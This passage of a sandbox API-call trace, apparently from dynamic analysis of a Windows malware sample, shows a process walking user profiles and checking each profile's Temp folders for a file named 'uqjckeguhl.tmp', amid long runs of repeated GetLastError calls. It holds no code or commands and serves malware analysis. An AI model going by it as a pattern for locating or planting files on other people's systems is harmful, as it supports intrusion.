	[0093.537] GetFileAttributesW (lpFileName="C:\\Users\\Default User\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default user\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0093.538] wsprintfW (in: param_1=0x69f6b8, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default User\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 56
	[0093.538] GetFileAttributesW (lpFileName="C:\\Users\\Default User\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default user\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0093.540] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0093.540] wsprintfW (in: param_1=0x69f6b8, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 51
	[0093.540] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0093.540] wsprintfW (in: param_1=0x69f6b8, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Nd9E1FYi\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 52
	[0093.540] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\nd9e1fyi\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0093.540] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0093.540] wsprintfW (in: param_1=0x69f6b8, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Public\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 49
	[0093.540] GetFileAttributesW (lpFileName="C:\\Users\\Public\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\public\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0093.541] wsprintfW (in: param_1=0x69f6b8, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Public\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 50
	[0093.541] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\public\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0093.541] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 0
	[0093.541] FindClose (in: hFindFile=0x653638 | out: hFindFile=0x653638) returned 1
	[0093.541] Sleep (dwMilliseconds=0x1388) 
	[0098.595] GetProfilesDirectoryW () returned 0x0
	[0098.596] GetProfilesDirectoryW () returned 0x1
	[0098.596] GetLastError () returned 0x7a
	[0098.596] GetLastError () returned 0x7a
	[0098.596] GetLastError () returned 0x7a
	[0098.596] GetLastError () returned 0x7a
	[0098.596] GetLastError () returned 0x7a
	[0098.596] GetLastError () returned 0x7a
	[0098.596] GetLastError () returned 0x7a
	[0098.596] GetLastError () returned 0x7a
	[0098.596] GetLastError () returned 0x7a
	[0098.596] GetLastError () returned 0x7a
	[0098.596] GetLastError () returned 0x7a
	[0098.596] GetLastError () returned 0x7a
	[0098.596] GetLastError () returned 0x7a
	[0098.596] GetLastError () returned 0x7a
	[0098.596] GetLastError () returned 0x7a
	[0098.596] GetLastError () returned 0x7a
	[0098.596] GetLastError () returned 0x7a
	[0098.596] GetLastError () returned 0x7a
	[0098.596] GetLastError () returned 0x7a
	[0098.596] GetLastError () returned 0x7a
	[0098.596] FindFirstFileW (in: lpFileName="C:\\Users\\*.*", lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 0x664ab8
	[0098.596] GetLastError () returned 0x7a
	[0098.596] GetLastError () returned 0x7a
	[0098.596] GetLastError () returned 0x7a
	[0098.596] GetLastError () returned 0x7a
	[0098.596] GetLastError () returned 0x7a
	[0098.596] GetLastError () returned 0x7a
	[0098.596] GetLastError () returned 0x7a
	[0098.596] GetLastError () returned 0x7a
	[0098.597] GetLastError () returned 0x7a
	[0098.597] GetLastError () returned 0x7a
	[0098.597] GetLastError () returned 0x7a
	[0098.597] GetLastError () returned 0x7a
	[0098.597] GetLastError () returned 0x7a
	[0098.597] GetLastError () returned 0x7a
	[0098.597] GetLastError () returned 0x7a
	[0098.597] GetLastError () returned 0x7a
	[0098.597] GetLastError () returned 0x7a
	[0098.597] GetLastError () returned 0x7a
	[0098.597] GetLastError () returned 0x7a
	[0098.597] GetLastError () returned 0x7a
	[0098.597] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0098.597] FindNextFileW (in: hFindFile=0x664ab8, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0098.597] GetLastError () returned 0x7a
	[0098.597] GetLastError () returned 0x7a
	[0098.597] GetLastError () returned 0x7a
	[0098.597] GetLastError () returned 0x7a
	[0098.597] GetLastError () returned 0x7a
	[0098.597] GetLastError () returned 0x7a
	[0098.597] GetLastError () returned 0x7a
	[0098.597] GetLastError () returned 0x7a
	[0098.597] GetLastError () returned 0x7a
	[0098.597] GetLastError () returned 0x7a
	[0098.597] GetLastError () returned 0x7a
	[0098.597] GetLastError () returned 0x7a
	[0098.597] GetLastError () returned 0x7a
	[0098.597] GetLastError () returned 0x7a
	[0098.597] GetLastError () returned 0x7a
	[0098.597] GetLastError () returned 0x7a
	[0098.597] GetLastError () returned 0x7a
	[0098.597] GetLastError () returned 0x7a
	[0098.597] GetLastError () returned 0x7a
	[0098.597] GetLastError () returned 0x7a
	[0098.597] lstrcmpW (lpString1="..", lpString2=".") returned 1
	[0098.597] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0098.597] FindNextFileW (in: hFindFile=0x664ab8, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] lstrcmpW (lpString1="All Users", lpString2=".") returned 1
	[0098.598] lstrcmpW (lpString1="All Users", lpString2="..") returned 1
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.598] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.599] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.600] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.601] GetLastError () returned 0x7a
	[0098.602] GetLastError () returned 0x7a
	[0098.602] GetLastError () returned 0x7a
	[0098.602] GetLastError () returned 0x7a
	[0098.602] GetLastError () returned 0x7a
	[0098.602] GetLastError () returned 0x7a
	[0098.602] GetLastError () returned 0x7a
	[0098.602] GetLastError () returned 0x7a
	[0098.602] GetLastError () returned 0x7a
	[0098.602] GetLastError () returned 0x7a
	[0098.602] GetLastError () returned 0x7a
	[0098.602] GetLastError () returned 0x7a
	[0098.602] GetLastError () returned 0x7a
	[0098.602] GetLastError () returned 0x7a
	[0098.602] GetLastError () returned 0x7a
	[0098.602] GetLastError () returned 0x7a
	[0098.602] GetLastError () returned 0x7a
	[0098.602] GetLastError () returned 0x7a
	[0098.602] GetLastError () returned 0x7a
	[0098.602] GetLastError () returned 0x7a
	[0098.602] GetLastError () returned 0x7a
	[0098.602] GetLastError () returned 0x7a
	[0098.602] GetLastError () returned 0x7a
	[0098.602] GetLastError () returned 0x7a
	[0098.602] GetLastError () returned 0x7a
	[0098.602] GetLastError () returned 0x7a
	[0098.602] GetLastError () returned 0x7a
	[0098.602] GetLastError () returned 0x7a
	[0098.602] GetLastError () returned 0x7a
	[0098.602] GetLastError () returned 0x7a
	[0098.602] GetLastError () returned 0x7a
	[0098.602] GetLastError () returned 0x7a
	[0098.602] GetLastError () returned 0x7a
	[0098.602] GetLastError () returned 0x7a
	[0098.602] GetLastError () returned 0x7a
	[0098.602] GetLastError () returned 0x7a
	[0098.602] GetLastError () returned 0x7a
	[0098.602] GetLastError () returned 0x7a
	[0098.602] GetLastError () returned 0x7a
	[0098.602] GetLastError () returned 0x7a
	[0098.602] wsprintfW (in: param_1=0x6a0c48, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\All Users\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 52
	[0098.602] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\all users\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0098.602] GetLastError () returned 0x3
	[0098.602] GetLastError () returned 0x3
	[0098.602] GetLastError () returned 0x3
	[0098.602] GetLastError () returned 0x3
	[0098.602] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.603] GetLastError () returned 0x3
	[0098.604] GetLastError () returned 0x3
	[0098.604] GetLastError () returned 0x3
	[0098.604] GetLastError () returned 0x3
	[0098.604] GetLastError () returned 0x3
	[0098.604] GetLastError () returned 0x3
	[0098.604] GetLastError () returned 0x3
	[0098.604] GetLastError () returned 0x3
	[0098.604] GetLastError () returned 0x3
	[0098.604] GetLastError () returned 0x3
	[0098.604] GetLastError () returned 0x3
	[0098.604] GetLastError () returned 0x3
	[0098.604] GetLastError () returned 0x3
	[0098.604] GetLastError () returned 0x3
	[0098.604] GetLastError () returned 0x3
	[0098.604] GetLastError () returned 0x3
	[0098.604] GetLastError () returned 0x3
	[0098.604] GetLastError () returned 0x3
	[0098.604] GetLastError () returned 0x3
	[0098.604] GetLastError () returned 0x3
	[0098.604] GetLastError () returned 0x3
	[0098.604] GetLastError () returned 0x3
	[0098.604] GetLastError () returned 0x3
	[0098.604] GetLastError () returned 0x3
	[0098.604] GetLastError () returned 0x3
	[0098.604] GetLastError () returned 0x3
	[0098.604] GetLastError () returned 0x3
	[0098.604] GetLastError () returned 0x3
	[0098.604] GetLastError () returned 0x3
	[0098.604] GetLastError () returned 0x3
	[0098.604] GetLastError () returned 0x3
	[0098.604] GetLastError () returned 0x3
	[0098.604] GetLastError () returned 0x3
	[0098.604] GetLastError () returned 0x3
	[0098.604] GetLastError () returned 0x3
	[0098.604] wsprintfW (in: param_1=0x6a0c48, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\All Users\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 53
	[0098.604] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\all users\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0098.604] FindNextFileW (in: hFindFile=0x664ab8, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0098.604] GetLastError () returned 0x3
	[0098.604] GetLastError () returned 0x3
	[0098.604] GetLastError () returned 0x3
	[0098.604] GetLastError () returned 0x3
	[0098.604] GetLastError () returned 0x3
	[0098.604] GetLastError () returned 0x3
	[0098.604] GetLastError () returned 0x3
	[0098.605] GetLastError () returned 0x3
	[0098.605] GetLastError () returned 0x3
	[0098.605] GetLastError () returned 0x3
	[0098.605] GetLastError () returned 0x3
	[0098.605] GetLastError () returned 0x3
	[0098.605] GetLastError () returned 0x3
	[0098.605] GetLastError () returned 0x3
	[0098.605] GetLastError () returned 0x3
	[0098.605] GetLastError () returned 0x3
	[0098.605] GetLastError () returned 0x3
	[0098.605] GetLastError () returned 0x3
	[0098.605] GetLastError () returned 0x3
	[0098.605] GetLastError () returned 0x3
	[0098.605] lstrcmpW (lpString1="Default", lpString2=".") returned 1
	[0098.605] lstrcmpW (lpString1="Default", lpString2="..") returned 1
	[0098.605] GetLastError () returned 0x3
	[0098.605] GetLastError () returned 0x3
	[0098.605] GetLastError () returned 0x3
	[0098.605] GetLastError () returned 0x3
	[0098.605] GetLastError () returned 0x3
	[0098.605] GetLastError () returned 0x3
	[0098.605] GetLastError () returned 0x3
	[0098.605] GetLastError () returned 0x3
	[0098.605] GetLastError () returned 0x3
	[0098.605] GetLastError () returned 0x3
	[0098.605] GetLastError () returned 0x3
	[0098.605] GetLastError () returned 0x3
	[0098.605] GetLastError () returned 0x3
	[0098.605] GetLastError () returned 0x3
	[0098.605] GetLastError () returned 0x3
	[0098.605] GetLastError () returned 0x3
	[0098.605] GetLastError () returned 0x3
	[0098.605] GetLastError () returned 0x3
	[0098.605] GetLastError () returned 0x3
	[0098.605] GetLastError () returned 0x3
	[0098.605] GetLastError () returned 0x3
	[0098.605] GetLastError () returned 0x3
	[0098.605] GetLastError () returned 0x3
	[0098.605] GetLastError () returned 0x3
	[0098.605] GetLastError () returned 0x3
	[0098.605] GetLastError () returned 0x3
	[0098.606] GetLastError () returned 0x3
	[0098.606] GetLastError () returned 0x3
	[0098.606] GetLastError () returned 0x3
	[0098.606] GetLastError () returned 0x3
	[0098.606] GetLastError () returned 0x3
	[0098.606] GetLastError () returned 0x3
	[0098.606] GetLastError () returned 0x3
	[0098.606] GetLastError () returned 0x3
	[0098.606] GetLastError () returned 0x3
	[0098.606] GetLastError () returned 0x3
	[0098.606] GetLastError () returned 0x3
	[0098.606] GetLastError () returned 0x3
	[0098.606] GetLastError () returned 0x3
	[0098.606] GetLastError () returned 0x3
	[0098.606] GetLastError () returned 0x3
	[0098.606] GetLastError () returned 0x3
	[0098.606] GetLastError () returned 0x3
	[0098.606] GetLastError () returned 0x3
	[0098.606] GetLastError () returned 0x3
	[0098.606] GetLastError () returned 0x3
	[0098.606] GetLastError () returned 0x3
	[0098.606] GetLastError () returned 0x3
	[0098.606] GetLastError () returned 0x3
	[0098.606] GetLastError () returned 0x3
	[0098.606] wsprintfW (in: param_1=0x6a0c48, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 50
	[0098.606] GetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0098.608] wsprintfW (in: param_1=0x6a0c48, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 51
	[0098.608] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0098.610] FindNextFileW (in: hFindFile=0x664ab8, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0098.610] wsprintfW (in: param_1=0x6a0c48, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default User\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 55
	[0098.610] GetFileAttributesW (lpFileName="C:\\Users\\Default User\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default user\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0098.611] wsprintfW (in: param_1=0x6a0c48, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default User\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 56
	[0098.611] GetFileAttributesW (lpFileName="C:\\Users\\Default User\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default user\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0098.612] FindNextFileW (in: hFindFile=0x664ab8, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0098.613] FindNextFileW (in: hFindFile=0x664ab8, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0098.613] wsprintfW (in: param_1=0x6a0c48, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 51
	[0098.613] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0098.613] wsprintfW (in: param_1=0x6a0c48, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Nd9E1FYi\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 52
	[0098.613] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\nd9e1fyi\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0098.613] FindNextFileW (in: hFindFile=0x664ab8, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0098.614] wsprintfW (in: param_1=0x6a0c48, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Public\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 49
	[0098.614] GetFileAttributesW (lpFileName="C:\\Users\\Public\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\public\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0098.614] wsprintfW (in: param_1=0x6a0c48, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Public\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 50
	[0098.614] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\public\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
